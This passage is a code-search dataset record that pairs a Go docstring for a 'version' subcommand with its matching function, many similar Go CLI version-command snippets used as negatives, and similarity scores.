strings.Join(b, \"\\n\")\n\ts = s + \"\\n\"\n\t// fmt.Println(s)\n\treturn\n}", "func StompText(text string) string{\n var stomped string = strings.ToLower(strings.Join(strings.Fields(text),\"\"))\n return stomped\n}" ]
[ "0.5594312", "0.5407655", "0.5132446", "0.4980806", "0.49772698", "0.49652177", "0.49532828", "0.48697796", "0.48507652", "0.48135316", "0.48085377", "0.4780502", "0.47786978", "0.4771983", "0.47438607", "0.47299135", "0.47121096", "0.47093588", "0.47034234", "0.46747828", "0.46745598", "0.465358", "0.4635157", "0.46309444", "0.46230727", "0.46223122", "0.462137", "0.4611954", "0.46100467", "0.45745602", "0.45704225", "0.45701244", "0.4568089", "0.4563594", "0.45574474", "0.4537474", "0.45331955", "0.4526649", "0.4521047", "0.451975", "0.45111892", "0.45108634", "0.45075986", "0.44940913", "0.4480481", "0.44752476", "0.44722852", "0.4470804", "0.4467737", "0.44660833", "0.44627717", "0.4452057", "0.44505376", "0.4443323", "0.4440737", "0.44404012", "0.44348925", "0.44222823", "0.44115347", "0.44072065", "0.44066697", "0.4404581", "0.44035137", "0.43934974", "0.43929908", "0.43924007", "0.43895102", "0.4388724", "0.43883312", "0.43783545", "0.4377326", "0.4374865", "0.436906", "0.4361163", "0.43610322", "0.43548605", "0.43515715", "0.43494216", "0.43485764", "0.43471187", "0.43428525", "0.4341217", "0.43398878", "0.4339584", "0.43304756", "0.4329934", "0.43276307", "0.43270016", "0.43263108", "0.43229887", "0.43215603", "0.43203834", "0.43121573", "0.4309529", "0.43070167", "0.43020117", "0.43016025", "0.42971355", "0.42953828", "0.42920038", "0.42919198" ]
0.0
-1
CreateVersionCommand creates a cmdline 'subcommand' to display version information. The format of the information printed is: / (; ; ...) The version and tags are set at build time using something like: go build ldflags \ "X github.com/grailbio/base/cmdutil.version=$version \ X github.com/grailbio/base/cmdutil.tags=$tags"
func CreateVersionCommand(name, prefix string) *cmdline.Command { return &cmdline.Command{ Runner: RunnerFunc(func(_ *cmdline.Env, _ []string) error { printVersion(prefix) return nil }), Name: name, Short: "Display version information", } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func NewVersionCommand(streams genericclioptions.IOStreams) *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"version\",\n\t\tShort: \"Print the version information for kubectl trace\",\n\t\tRunE: func(c *cobra.Command, args []string) error {\n\t\t\tfmt.Fprintln(streams.Out, version.String())\n\t\t\treturn nil\n\t\t},\n\t}\n\treturn cmd\n}", "func NewVersionCommand(settings *CmdSetting) *cobra.Command {\n\tversionCmd := &VersionCmd{settings: settings}\n\n\tcmd := &cobra.Command{\n\t\tUse: \"version\",\n\t\tShort: \"Prints the version of kubectl-recreate\",\n\t\tSilenceUsage: true,\n\t\tRun: versionCmd.run,\n\t}\n\n\treturn cmd\n}", "func NewVersionCommand() *cobra.Command {\n\treturn &cobra.Command{\n\t\tUse: \"version\",\n\t\tShort: \"Prints out build version information\",\n\t\tLong: \"Prints out build version information\",\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\tfmt.Printf(`Version: %v\nGitRevision: %v\nGolangVersion: %v\n`,\n\t\t\t\tversion.VelaVersion,\n\t\t\t\tversion.GitRevision,\n\t\t\t\truntime.Version())\n\t\t},\n\t\tAnnotations: map[string]string{\n\t\t\ttypes.TagCommandType: types.TypePlugin,\n\t\t},\n\t}\n}", "func newVersionCommand() *cobra.Command {\n\treturn &cobra.Command{\n\t\tUse: \"version\",\n\t\tShort: \"Prints version information\",\n\t\tRunE: func(c *cobra.Command, args []string) error {\n\t\t\treturn versionTemplate.Execute(os.Stdout, build.GetInfo())\n\t\t},\n\t}\n}", "func CreateInfoCommand(name, prefix string, info ...func(*context.T, *cmdline.Env, []string) error) *cmdline.Command {\n\treturn &cmdline.Command{\n\t\tRunner: v23cmd.RunnerFunc(func(ctx *context.T, env *cmdline.Env, args []string) error {\n\t\t\tprintVersion(prefix)\n\t\t\tfor _, ifn := range info {\n\t\t\t\tif err := ifn(ctx, env, args); err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t}\n\t\t\treturn nil\n\t\t}),\n\t\tName: name,\n\t\tShort: \"Display version information\",\n\t}\n}", "func NewCmdVersion(rootCmd *cobra.Command) *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"version\",\n\t\tShort: \"Shows openebs kubectl plugin's version\",\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\tk, _ := client.NewK8sClient(\"\")\n\t\t\tcomponentVersionMap, err := k.GetVersionMapOfComponents()\n\n\t\t\tif err != nil {\n\t\t\t\tfmt.Println(\"Client Version: \" + getValidVersion(rootCmd.Version))\n\t\t\t\tfmt.Fprintf(os.Stderr, \"\\nError getting Components Version...\")\n\t\t\t\tcheckForLatestVersion(rootCmd.Version)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\tvar rows []metav1.TableRow = []metav1.TableRow{\n\t\t\t\t{\n\t\t\t\t\tCells: []interface{}{\"Client\", getValidVersion(rootCmd.Version)},\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tCells: []interface{}{\"OpenEBS CStor\", getValidVersion(componentVersionMap[util.CstorCasType])},\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tCells: []interface{}{\"OpenEBS Jiva\", getValidVersion(componentVersionMap[util.JivaCasType])},\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tCells: []interface{}{\"OpenEBS LVM LocalPV\", getValidVersion(componentVersionMap[util.LVMCasType])},\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tCells: []interface{}{\"OpenEBS ZFS LocalPV\", getValidVersion(componentVersionMap[util.ZFSCasType])},\n\t\t\t\t},\n\t\t\t}\n\n\t\t\tutil.TablePrinter(util.VersionColumnDefinition, rows, printers.PrintOptions{Wide: true})\n\t\t\tcheckForLatestVersion(rootCmd.Version)\n\t\t},\n\t}\n\tcmd.SetUsageTemplate(versionCmdHelp)\n\treturn cmd\n}", "func NewVersionCommand(isvrCli command.Cli) *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"version\",\n\t\tShort: \"Display versions of the CLI and Server\",\n\t\tArgs: cli.NoArgs,\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\treturn runVersion(isvrCli)\n\t\t},\n\t}\n\n\treturn cmd\n}", "func NewVersionCommand(version string, buildDate string, out io.Writer) *cobra.Command {\n\tversionCmd := &cobra.Command{\n\t\tUse: \"version\",\n\t\tShort: \"display the current version\",\n\t\tLong: \"display the current version\",\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\tfmt.Fprintf(out, \"Primes Worker:\\n\")\n\t\t\tfmt.Fprintf(out, \" Version: %s\\n\", version)\n\t\t\tfmt.Fprintf(out, \" Built: %s\\n\", buildDate)\n\t\t\tfmt.Fprintf(out, \" Go Version: %s\\n\", runtime.Version())\n\t\t},\n\t}\n\n\treturn versionCmd\n}", "func NewVersionCommand() *cobra.Command {\n\treturn &cobra.Command{\n\t\tUse: \"version\",\n\t\tShort: \"Prints the kperf version\",\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tcmd.Printf(\"Version: %s\\n\", Version)\n\t\t\tcmd.Printf(\"Build Date: %s\\n\", BuildDate)\n\t\t\tcmd.Printf(\"Git Revision: %s\\n\", GitRevision)\n\t\t\treturn nil\n\t\t},\n\t}\n}", "func NewCmdVersion(w io.Writer) *cobra.Command {\n\tvar short bool\n\n\tversionCmd := cobra.Command{\n\t\tUse: \"version\",\n\t\tShort: \"Prints the kustomize version\",\n\t\tExample: `kustomize version`,\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\tif short {\n\t\t\t\tfmt.Fprintln(w, provenance.GetProvenance().Short())\n\t\t\t} else {\n\t\t\t\tfmt.Fprintln(w, provenance.GetProvenance().Full())\n\t\t\t}\n\t\t},\n\t}\n\n\tversionCmd.Flags().BoolVar(&short, \"short\", false, \"short form\")\n\treturn &versionCmd\n}", "func newVersion() *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"version\",\n\t\tShort: \"show build version\",\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tfmt.Println(version)\n\t\t\treturn nil\n\t\t},\n\t}\n\n\treturn cmd\n}", "func NewVersionCommand() *cobra.Command {\n\treturn &cobra.Command{\n\t\tUse: \"version\",\n\t\tArgs: cobra.NoArgs,\n\t\tShort: \"Print the stanza version\",\n\t\tRun: func(_ *cobra.Command, _ []string) {\n\t\t\tfmt.Println(version.GetVersion(), runtime.GOOS, runtime.GOARCH)\n\t\t},\n\t}\n}", "func versionCmd(c *cli.Context) error {\n\tif len(c.Args()) > 0 {\n\t\treturn errors.New(\"'buildah version' does not accept arguments\")\n\t}\n\n\t//converting unix time from string to int64\n\tbuildTime, err := strconv.ParseInt(buildInfo, 10, 64)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tfmt.Println(\"Version: \", buildah.Version)\n\tfmt.Println(\"Go Version: \", runtime.Version())\n\tfmt.Println(\"Image Spec: \", ispecs.Version)\n\tfmt.Println(\"Runtime Spec: \", rspecs.Version)\n\tfmt.Println(\"CNI Spec: \", cniversion.Current())\n\tfmt.Println(\"libcni Version: \", cniVersion)\n\tfmt.Println(\"Git Commit: \", gitCommit)\n\n\t//Prints out the build time in readable format\n\tfmt.Println(\"Built: \", time.Unix(buildTime, 0).Format(time.ANSIC))\n\tfmt.Println(\"OS/Arch: \", runtime.GOOS+\"/\"+runtime.GOARCH)\n\n\treturn nil\n}", "func NewVersionCmd(cliName string) *cobra.Command {\n\tvar short bool\n\tversionCmd := cobra.Command{\n\t\tUse: \"version\",\n\t\tShort: fmt.Sprintf(\"Print version information\"),\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\tversion := argocd.GetVersion()\n\t\t\tfmt.Printf(\"%s: %s\\n\", cliName, version)\n\t\t\tif short {\n\t\t\t\treturn\n\t\t\t}\n\t\t\tfmt.Printf(\" BuildDate: %s\\n\", version.BuildDate)\n\t\t\tfmt.Printf(\" GitCommit: %s\\n\", version.GitCommit)\n\t\t\tfmt.Printf(\" GitTreeState: %s\\n\", version.GitTreeState)\n\t\t\tif version.GitTag != \"\" {\n\t\t\t\tfmt.Printf(\" GitTag: %s\\n\", version.GitTag)\n\t\t\t}\n\t\t\tfmt.Printf(\" GoVersion: %s\\n\", version.GoVersion)\n\t\t\tfmt.Printf(\" Compiler: %s\\n\", version.Compiler)\n\t\t\tfmt.Printf(\" Platform: %s\\n\", version.Platform)\n\t\t},\n\t}\n\tversionCmd.Flags().BoolVar(&short, \"short\", false, \"print just the version number\")\n\treturn &versionCmd\n}", "func NewCmdVersion() *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"version\",\n\t\tShort: \"Show dmaas-operator version\",\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\tshowVersion()\n\t\t},\n\t}\n\n\treturn cmd\n}", "func NewCommand() *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"version\",\n\t\tShort: \"Version for apisix-mesh-agent\",\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\tfmt.Println(version.String())\n\t\t},\n\t}\n\treturn cmd\n}", "func Version() cli.Command {\n\treturn cli.Command{\n\t\tName: \"version\",\n\t\tUsage: \"prints version information\",\n\t\tFlags: []cli.Flag{\n\t\t\tcli.BoolFlag{\n\t\t\t\tName: \"json\",\n\t\t\t\tUsage: \"specify this option to output data as JSON\",\n\t\t\t},\n\t\t},\n\t\tAction: func(c *cli.Context) error {\n\t\t\tisJSON := c.Bool(\"json\")\n\n\t\t\tinfo := versionInfo{\n\t\t\t\tCurator: curator.BuildRevision,\n\t\t\t\tJasper: curator.JasperChecksum,\n\t\t\t\tPoplarEvents: curator.PoplarEventsChecksum,\n\t\t\t\tPoplarRecorder: curator.PoplarRecorderChecksum,\n\t\t\t\tCedarMetrics: curator.CedarMetricsChecksum,\n\t\t\t}\n\t\t\tif isJSON {\n\t\t\t\tout, err := json.MarshalIndent(info, \"\", \" \")\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn errors.Wrap(err, \"marshalling JSON\")\n\t\t\t\t}\n\t\t\t\tfmt.Println(string(out))\n\t\t\t\treturn nil\n\t\t\t}\n\n\t\t\tfmt.Println(info)\n\t\t\treturn nil\n\t\t},\n\t}\n}", "func NewCmdVersion() *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"version\",\n\t\tShort: \"Print Maya version information\",\n\t\tLong: `Print Maya version information for the current context\n\nExample:\nmaya version\n\t`,\n\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\tfmt.Printf(\"Version: %s\\n\", getVersion())\n\t\t\tfmt.Printf(\"Git commit: %s\", getGitCommit())\n\t\t\t//fmt.Printf(\"Git tree state: %s\\n\", GitTreeState)\n\t\t\tfmt.Printf(\"Go-Version: %s\\n\", runtime.Version())\n\t\t\tfmt.Printf(\"GOARCH: %s\\n\", runtime.GOARCH)\n\t\t\tfmt.Printf(\"GOOS: %s\\n\", runtime.GOOS)\n\n\t\t},\n\t}\n\n\treturn cmd\n}", "func NewVersionCmd() *cobra.Command {\n\tversionCmd := &cobra.Command{\n\t\tUse: \"version\",\n\t\tShort: \"Prints the cli version\",\n\t\tArgs: cobra.NoArgs,\n\t\tRunE: func(cobraCmd *cobra.Command, args []string) error {\n\t\t\tif version == \"\" {\n\t\t\t\tversion = \"latest\"\n\t\t\t}\n\n\t\t\tfmt.Fprint(os.Stdout, version)\n\t\t\treturn nil\n\t\t},\n\t}\n\n\treturn versionCmd\n}", "func NewCommand() *cobra.Command {\n\treturn &cobra.Command{\n\t\tUse: \"version\",\n\t\tShort: \"The version of matryoshka\",\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tfmt.Println(BuildCommit)\n\t\t\treturn nil\n\t\t},\n\t}\n}", "func newVersionCommands(globalOpts *globalOptions) *cobra.Command {\n\toptions := &versionOptions{\n\t\tglobalOptions: globalOpts,\n\t}\n\n\tcmd := &cobra.Command{\n\t\tUse: \"version\",\n\t\tShort: \"Print the CLI version information\",\n\t\tLong: versionDesc,\n\t\tExample: versionExample,\n\t\tArgs: cobra.ExactArgs(0),\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\treturn options.run()\n\t\t},\n\t}\n\n\toptions.addVersionFlags(cmd)\n\n\treturn cmd\n}", "func Version() *Command {\n\treturn &Command{\n\t\tCommand: &cobra.Command{\n\t\t\tUse: \"version\",\n\t\t\tShort: \"Show the current version\",\n\t\t\tLong: \"The `doctl version` command displays the version of the doctl software.\",\n\t\t\tGroupID: configureDoctlGroup,\n\t\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\t\tif doctl.Build != \"\" {\n\t\t\t\t\tdoctl.DoitVersion.Build = doctl.Build\n\t\t\t\t}\n\t\t\t\tif doctl.Major != \"\" {\n\t\t\t\t\ti, _ := strconv.Atoi(doctl.Major)\n\t\t\t\t\tdoctl.DoitVersion.Major = i\n\t\t\t\t}\n\t\t\t\tif doctl.Minor != \"\" {\n\t\t\t\t\ti, _ := strconv.Atoi(doctl.Minor)\n\t\t\t\t\tdoctl.DoitVersion.Minor = i\n\t\t\t\t}\n\t\t\t\tif doctl.Patch != \"\" {\n\t\t\t\t\ti, _ := strconv.Atoi(doctl.Patch)\n\t\t\t\t\tdoctl.DoitVersion.Patch = i\n\t\t\t\t}\n\t\t\t\tif doctl.Label != \"\" {\n\t\t\t\t\tdoctl.DoitVersion.Label = doctl.Label\n\t\t\t\t}\n\n\t\t\t\tvar output string\n\t\t\t\tif viper.GetString(\"output\") == \"json\" {\n\t\t\t\t\toutput = doctl.DoitVersion.CompleteJSON(&doctl.GithubLatestVersioner{})\n\t\t\t\t} else {\n\t\t\t\t\toutput = doctl.DoitVersion.Complete(&doctl.GithubLatestVersioner{})\n\t\t\t\t}\n\n\t\t\t\tfmt.Println(output)\n\t\t\t},\n\t\t},\n\t}\n}", "func CmdVersion(version string) *subcommands.Command {\n\treturn &subcommands.Command{\n\t\tUsageLine: \"version <options>\",\n\t\tShortDesc: \"prints version number\",\n\t\tLongDesc: \"Prints the tool version number.\",\n\t\tCommandRun: func() subcommands.CommandRun {\n\t\t\treturn &versionRun{version: version}\n\t\t},\n\t}\n}", "func versionCmd() *cobra.Command {\n\treturn &cobra.Command{\n\t\tUse: \"version\",\n\t\tShort: \"Prints the build version\",\n\t\tRun: func(*cobra.Command, []string) {\n\t\t\tversion.Write(os.Stdout)\n\t\t},\n\t}\n}", "func Command() *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"version\",\n\t\tShort: \"Display version number\",\n\t\tArgs: cobra.NoArgs,\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\tfmt.Print(\"Elk 🦌\\n\")\n\t\t\tif len(version.version) > 0 {\n\t\t\t\tfmt.Printf(\" Version: \\t %s\\n\", version.version)\n\t\t\t}\n\n\t\t\tif len(version.commit) > 0 {\n\t\t\t\tfmt.Printf(\" Git Commit: \\t %s\\n\", version.commit)\n\t\t\t}\n\n\t\t\tif len(version.date) > 0 {\n\t\t\t\tfmt.Printf(\" Built: \\t %s\\n\", strings.Replace(version.date, \"_\", \" \", -1))\n\t\t\t}\n\n\t\t\tif (len(version.os) + len(version.arch)) > 0 {\n\t\t\t\tfmt.Printf(\" OS/Arch: \\t %s/%s\\n\", version.os, version.arch)\n\t\t\t}\n\n\t\t\tif len(version.goVersion) > 0 {\n\t\t\t\tfmt.Printf(\" Go Version: \\t %s\\n\", version.goVersion)\n\t\t\t}\n\t\t},\n\t}\n\n\treturn cmd\n}", "func CommandVersion() {\n\tfmt.Printf(\n\t\t\"Version: %s\\nGit commit: %s\\nBuild date: %s\\n\",\n\t\tVERSION,\n\t\tGIT_COMMIT,\n\t\tBUILD_DATE,\n\t)\n}", "func (v *VersionCommand) Init(c *Cli) {\n\tv.cli = c\n\tv.cmd = &cobra.Command{\n\t\tUse: \"version\",\n\t\tShort: \"Print versions about Pouch CLI and Pouchd\",\n\t\tArgs: cobra.NoArgs,\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\treturn v.runVersion()\n\t\t},\n\t\tExample: versionExample(),\n\t}\n\tv.addFlags()\n}", "func (p *plugin) cmdVersion(w irc.ResponseWriter, r *irc.Request, params cmd.ParamList) {\n\trev, _ := strconv.ParseInt(app.VersionRevision, 10, 64)\n\tstamp := time.Unix(rev, 0)\n\tutime := math.Abs(time.Since(lastRestart).Hours())\n\n\tvar upSince string\n\tif utime < 1 {\n\t\tupSince = util.Bold(\"<1\")\n\t} else {\n\t\tupSince = util.Bold(\"%.0f\", utime)\n\t}\n\n\tproto.PrivMsg(\n\t\tw, r.Target,\n\t\tTextVersionDisplay,\n\t\tr.SenderName,\n\t\tutil.Bold(app.Name),\n\t\tutil.Bold(\"%d.%d\", app.VersionMajor, app.VersionMinor),\n\t\tstamp.Format(TextDateFormat),\n\t\tstamp.Format(TextTimeFormat),\n\t\tupSince,\n\t)\n}", "func New(b BuildInfo) *Command {\n\tfs := flag.NewFlagSet(\"changelog\", flag.ExitOnError)\n\n\treturn &Command{\n\t\tfs: fs,\n\t\tb: b,\n\t\tfile: fs.String(fileOptName, dfltChangelogFile, \"changelog file name\"),\n\t\tdebug: fs.Bool(debugOptName, false, \"log debug information\"),\n\t\ttoStdOut: fs.Bool(stdOutOptName, false, \"output changelog to stdout instead to file\"),\n\t\thistory: fs.Bool(historyOptName, false, \"create history of old versions tags (output is always stdout)\"),\n\t\tignore: fs.Bool(ignoreOptName, false, \"ignore parsing errors of invalid (not conventional) commit messages\"),\n\t\tsinceTag: fs.String(sinceTagOptName, \"\", fmt.Sprintf(\"in combination with -%s: if a tag is specified, the changelog will be created from that tag on\", historyOptName)),\n\t\tinitConfig: fs.Bool(initDfltConfigOptName, false, fmt.Sprintf(\"initialize a default changelog configuration '%s'\", config.FileName)),\n\t\tnoPrompt: fs.Bool(noPromptOptName, false, \"do not prompt for next version\"),\n\t\tversion: fs.Bool(versionOptName, false, \"show program version information\"),\n\t\tnum: fs.Int(numOptName, 0, fmt.Sprintf(\"in combination with -%s: the number of tags to go back\", historyOptName)),\n\t}\n}", "func (r Describe) NewCommand(ctx context.Context, name string) *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: name[strings.LastIndex(name, \".\")+1:] + \" [NAME[:VERSION]] [RESOURCE] [FILTER]\",\n\t\tShort: \"Describe registered releases with states information.\",\n\t\tLong: \"Describe registered releases with states information\",\n\t\tArgs: require.Args(r.validation),\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tvar name string\n\t\t\tvar version semver.Version\n\t\t\tif len(args) > 0 {\n\t\t\t\tparts := strings.Split(args[0], \":\")\n\t\t\t\tparts = append(parts, \"\")\n\t\t\t\tname = parts[0]\n\n\t\t\t\tif parts[1] != \"\" {\n\t\t\t\t\tvar err error\n\t\t\t\t\tversion, err = semver.Parse(parts[1])\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tvar resource string\n\t\t\tif len(args) > 1 {\n\t\t\t\tresource = args[1]\n\t\t\t}\n\n\t\t\tvar filter string\n\t\t\tif len(args) > 2 {\n\t\t\t\tfilter = args[2]\n\t\t\t}\n\n\t\t\topts := describeOptions{\n\t\t\t\tName: name,\n\t\t\t\tVersion: version,\n\t\t\t\tResource: resource,\n\t\t\t\tFilter: filter,\n\t\t\t}\n\t\t\treturn r.run(ctx, cmd.OutOrStdout(), opts)\n\t\t},\n\t\tSilenceErrors: true,\n\t\tSilenceUsage: true,\n\t}\n\n\tcmd.SetUsageTemplate(global.DefaultUsageTemplate)\n\tcmd.SetHelpCommand(&cobra.Command{Hidden: true})\n\n\tflags := cmd.Flags()\n\tflags.SortFlags = false\n\tflags.Bool(\"help\", false, \"Show help information.\")\n\treturn cmd\n}", "func (srv *Server) CmdVersion(stdin io.ReadCloser, stdout io.Writer, args ...string) error {\n\tfmt.Fprintf(stdout, \"Version:%s\\n\", VERSION)\n\treturn nil\n}", "func (v *VersionCommand) Init(c *Cli) {\n\tv.cli = c\n\n\tv.cmd = &cobra.Command{\n\t\tUse: \"version\",\n\t\tShort: \"Print version\",\n\t}\n}", "func CreateCmd() *cobra.Command {\n\tvar cmd = cobra.Command{\n\t\tUse: \"ch.viac\",\n\t\tShort: \"Import VIAC values from JSON files\",\n\t\tLong: `Open app.viac.ch, choose a portfolio, and select \"From start\" in the overview dash. In the Chrome dev tools, save the response from the \"performance\" XHR call, and pass the resulting file to this importer.`,\n\n\t\tArgs: cobra.ExactValidArgs(1),\n\n\t\tRunE: run,\n\t}\n\tcmd.Flags().StringP(\"from\", \"f\", \"0001-01-01\", \"YYYY-MM-DD - ignore entries before this date\")\n\tcmd.Flags().StringP(\"account\", \"a\", \"\", \"account name\")\n\treturn &cmd\n}", "func versionRun(cmd *cobra.Command, args []string) {\n\tprintKeyValue(\"Version: \", version)\n\tprintKeyValue(\"Commit: \", commit)\n\tprintKeyValue(\"Date: \", date)\n\tprintKeyValue(\"Author: \", author)\n\tprintKeyValue(\"Website: \", website)\n}", "func newBundleBuildCmd() *cobra.Command {\n\tbundleBuildCmd := &cobra.Command{\n\t\tUse: \"build\",\n\t\tShort: \"Build operator bundle image\",\n\t\tLong: `The \"opm alpha bundle build\" command will generate operator\nbundle metadata if needed and build bundle image with operator manifest\nand metadata for a specific version.\n\nFor example: The command will generate annotations.yaml metadata plus\nDockerfile for bundle image and then build a container image from\nprovided operator bundle manifests generated metadata\ne.g. \"quay.io/example/operator:v0.0.1\".\n\nAfter the build process is completed, a container image would be built\nlocally in docker and available to push to a container registry.\n\n$ opm alpha bundle build --directory /test/0.1.0/ --tag quay.io/example/operator:v0.1.0 \\\n\t--package test-operator --channels stable,beta --default stable --overwrite\n\nNote:\n* Bundle image is not runnable.\n* All manifests yaml must be in the same directory. `,\n\t\tRunE: buildFunc,\n\t\tArgs: cobra.NoArgs,\n\t}\n\n\tbundleBuildCmd.Flags().StringVarP(&buildDir, \"directory\", \"d\", \"\",\n\t\t\"The directory where bundle manifests and metadata for a specific version are located\")\n\tif err := bundleBuildCmd.MarkFlagRequired(\"directory\"); err != nil {\n\t\tlog.Fatalf(\"Failed to mark `directory` flag for `build` subcommand as required\")\n\t}\n\n\tbundleBuildCmd.Flags().StringVarP(&tag, \"tag\", \"t\", \"\",\n\t\t\"The image tag applied to the bundle image\")\n\tif err := bundleBuildCmd.MarkFlagRequired(\"tag\"); err != nil {\n\t\tlog.Fatalf(\"Failed to mark `tag` flag for `build` subcommand as required\")\n\t}\n\n\tbundleBuildCmd.Flags().StringVarP(&pkg, \"package\", \"p\", \"\",\n\t\t\"The name of the package that bundle image belongs to \"+\n\t\t\t\"(Required if `directory` is not pointing to a bundle in the nested bundle format)\")\n\n\tbundleBuildCmd.Flags().StringVarP(&channels, \"channels\", \"c\", \"\",\n\t\t\"The list of channels that bundle image belongs to\"+\n\t\t\t\"(Required if `directory` is not pointing to a bundle in the nested bundle format)\")\n\n\tbundleBuildCmd.Flags().StringVarP(&containerTool, \"image-builder\", \"b\", \"docker\",\n\t\t\"Tool used to manage container images. One of: [docker, podman, buildah]\")\n\n\tbundleBuildCmd.Flags().StringVarP(&defaultChannel, \"default\", \"e\", \"\",\n\t\t\"The default channel for the bundle image\")\n\n\tbundleBuildCmd.Flags().BoolVarP(&overwrite, \"overwrite\", \"o\", false,\n\t\t\"To overwrite annotations.yaml locally if existed. By default, overwrite is set to `false`.\")\n\n\tbundleBuildCmd.Flags().StringVarP(&outputDir, \"output-dir\", \"u\", \"\",\n\t\t\"Optional output directory for operator manifests\")\n\n\treturn bundleBuildCmd\n}", "func GetVersionCmd(version string, commit string) *cobra.Command {\n\treturn &cobra.Command{\n\t\tUse: VersionCmdName,\n\t\tShort: VersionCmdShort,\n\t\tRun: func(*cobra.Command, []string) {\n\t\t\tif commit != \"\" {\n\t\t\t\tfmt.Println(fmt.Sprintf(\"%s (%s)\", version, commit))\n\t\t\t} else {\n\t\t\t\tfmt.Println(version)\n\t\t\t}\n\t\t},\n\t}\n}", "func NewCreateCmd(globalFlags *flags.GlobalFlags) *cobra.Command {\n\tcmd := &CreateCmd{\n\t\tGlobalFlags: globalFlags,\n\t\tlog: log.GetInstance(),\n\t}\n\n\tcobraCmd := &cobra.Command{\n\t\tUse: \"create\",\n\t\tShort: \"Create a new virtual cluster\",\n\t\tLong: `\n#######################################################\n################### vcluster create ###################\n#######################################################\nCreates a new virtual cluster\n\nExample:\nvcluster create test --namespace test\n#######################################################\n\t`,\n\t\tArgs: cobra.ExactArgs(1),\n\t\tRunE: func(cobraCmd *cobra.Command, args []string) error {\n\t\t\t// Check for newer version\n\t\t\tupgrade.PrintNewerVersionWarning()\n\n\t\t\treturn cmd.Run(cobraCmd, args)\n\t\t},\n\t}\n\n\tcobraCmd.Flags().StringVar(&cmd.ChartVersion, \"chart-version\", upgrade.GetVersion(), \"The virtual cluster chart version to use\")\n\tcobraCmd.Flags().StringVar(&cmd.ChartName, \"chart-name\", \"vcluster\", \"The virtual cluster chart name to use\")\n\tcobraCmd.Flags().StringVar(&cmd.ChartRepo, \"chart-repo\", \"https://charts.loft.sh\", \"The virtual cluster chart repo to use\")\n\tcobraCmd.Flags().StringVar(&cmd.ReleaseValues, \"release-values\", \"\", \"Path where to load the virtual cluster helm release values from\")\n\tcobraCmd.Flags().StringVar(&cmd.K3SImage, \"k3s-image\", \"\", \"If specified, use this k3s image version\")\n\tcobraCmd.Flags().StringSliceVarP(&cmd.ExtraValues, \"extra-values\", \"f\", []string{}, \"Path where to load extra helm values from\")\n\tcobraCmd.Flags().BoolVar(&cmd.CreateNamespace, \"create-namespace\", true, \"If true the namespace will be created if it does not exist\")\n\tcobraCmd.Flags().BoolVar(&cmd.DisableIngressSync, \"disable-ingress-sync\", false, \"If true the virtual cluster will not sync any ingresses\")\n\tcobraCmd.Flags().BoolVar(&cmd.CreateClusterRole, \"create-cluster-role\", false, \"If true a cluster role will be created to access nodes, storageclasses and priorityclasses\")\n\tcobraCmd.Flags().BoolVar(&cmd.Expose, \"expose\", false, \"If true will create a load balancer service to expose the vcluster endpoint\")\n\tcobraCmd.Flags().BoolVar(&cmd.Connect, \"connect\", false, \"If true will run vcluster connect directly after the vcluster was created\")\n\treturn cobraCmd\n}", "func mkzversion(dir, file string) {\n\tout := fmt.Sprintf(\n\t\t\"// auto generated by go tool dist\\n\"+\n\t\t\t\"\\n\"+\n\t\t\t\"package runtime\\n\"+\n\t\t\t\"\\n\"+\n\t\t\t\"const defaultGoroot = `%s`\\n\"+\n\t\t\t\"const theVersion = `%s`\\n\"+\n\t\t\t\"const goexperiment = `%s`\\n\"+\n\t\t\t\"const stackGuardMultiplier = %d\\n\"+\n\t\t\t\"var buildVersion = theVersion\\n\", goroot_final, findgoversion(), os.Getenv(\"GOEXPERIMENT\"), stackGuardMultiplier())\n\n\twritefile(out, file, writeSkipSame)\n}", "func versionFlag(cmd *cobra.Command) {\n\tversion, err := cmd.Flags().GetBool(\"version\")\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\tos.Exit(1)\n\t}\n\tif version {\n\t\tfmt.Printf(\"\\nversion: %s\\n\\nbuild: %s\\n\\n\",\n\t\t\tbuildVersion, buildDate)\n\t\tos.Exit(0)\n\t}\n}", "func NewGetAppVersionCmd(out io.Writer) *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"app-version\",\n\t\tShort: \"Get Application version\",\n\t\tLong: 